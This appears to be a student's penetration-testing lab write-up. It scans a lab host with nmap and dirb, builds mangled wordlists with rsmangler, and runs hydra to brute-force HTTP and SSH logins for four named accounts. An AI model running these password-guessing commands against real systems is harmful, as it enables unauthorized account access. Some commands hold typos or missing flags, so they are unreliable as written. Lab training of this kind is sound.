Lab 5.1: Password-Guessing
Scenario
10.0.5.21 has a listing of bios that can in turn be used in information gathering. If successful, you can gain access to hidden resources and possibly a login or two.
Check to make sure SSH works
NSLookup
run your port scanner script to find the DNS server on the 10.0.5/24 network
nslookup 10.0.5.21 10.0.5.22This command uses the DNS IP address we found to look for a hostname for 10.0.5.21
Deliverable 1. Provide a screenshot that shows the lookup and reported hostname.
Hacking the Shire Staff
Target: 10.0.5.21
Deliverable 2. Using what you have during the reconnaissance modules, run a scan to determine any listening TCP services to include the service versions. Provide a screenshot of both your command and results.
nmap -sV 10.0.5.2122/TCP OPENSSH 8.0
80/TCP Apache httpd 2.4.37
9090/tcp closed zues-admin
Deliverable 3. Let's see if we can get a little more information on your website such as hidden directories. Research the dirb command and run it against the webserver. Turn off recursion. Provide a screenshot of anything secret you've found.
dirb http://10.0.5.21 -r-rturns of recursion
Deliverable 4. Provide a screenshot that displays a prompt when attempting to access a protected directory.
Cracking the http password
The usernames for our http password protected case will be just the first names for our characters. Such as samwise, pippin, bilbo, and frodo.
Start with one of the group member's output lists from rsmangler to try and guess passwords on the target server.
When doing the maximum characters for Frodo, 8 characters excluded the secret word that I I needed to use to get the password. I increased the max to 12 characters to avoid that issue.
Frodo
nano frodo.txtInput Words:
The list to be mangled needs to have a newline at the bottom on it
rsmangler --file frodo.txt -m 6 -x 12 > frodo.pass.txt--file bilbo.txtspecifies the file with the words you want to mangle-m 6 -x 12means make the words minimum 6 characters and maximum 12 characters> bilbo.pass.txtspecifies the file you want to put the mangled words into
wc -l frodo.pass.txt(to check word count)sudo hydra -l frodo -P frodo.pass.txt 10.0.5.21 -m /admin/ http-get-m /admin/sets the path for the HTTP login pagehttp-getspecifies the protocol and method
Pippin
nano pippin.txtInput words:
The list to be mangled needs to have a newline at the bottom on it
rsmangler --file pippin.txt -m 6 -x 12 > frodo.pass.txtwc -l pippin.pass.txt(to check word count)sudo hydra -l pippin -P pippin.pass.txt 10.0.5.21 -m /admin/ http-get
Bilbo
nano bilbo.txtInput words:
The list to be mangled needs to have a newline at the bottom on it
rsmangler --file biblo.txt -m 6 -x 12 > biblo.pass.txtwc -l bilbo.pass.txt(to check word count)sudo hydra -l biblo -P biblo.pass.txt 10.0.5.21 -m /admin/ http-get
Samwise
nano samwise.txtInput words:
The list to be mangled needs to have a newline at the bottom on it
rsmangler --file samwise.txt -m 6 -x 12 > samwise.pass.txtwc -l samwise.pass.txt(to check word count)sudo hydra -l samwise -P samwise.pass.txt 10.0.5.21 -m /admin/ http-get
Brute forcing system accounts
Brute-forcing web logins can be much faster than some other services. SSH, for example, will often tear-down sessions after 3 failed logins which can slow down password guessing attacks.
The target server also has SSH login accounts for the same staff members though their names are formatted first.lastname. (pippin is a nickname (not a first name) and wouldn't be used)
We are going to be using the same method we used for the http password cracking, but just with ssh instead. Follow the command below for each of the 4 acocunts to find the passwords!
nano wordlist.txt
rsmangler --file wordlist.txt -m 6 -x 12 > wordlist.pass.txt
sudo hydra -l firstname.lastname wordlist.pass.txt 10.0.5.21 -t 4 ssh
frodo.baggins
peregrin.took
bilbo.baggins
samwise.gamgee
Last updated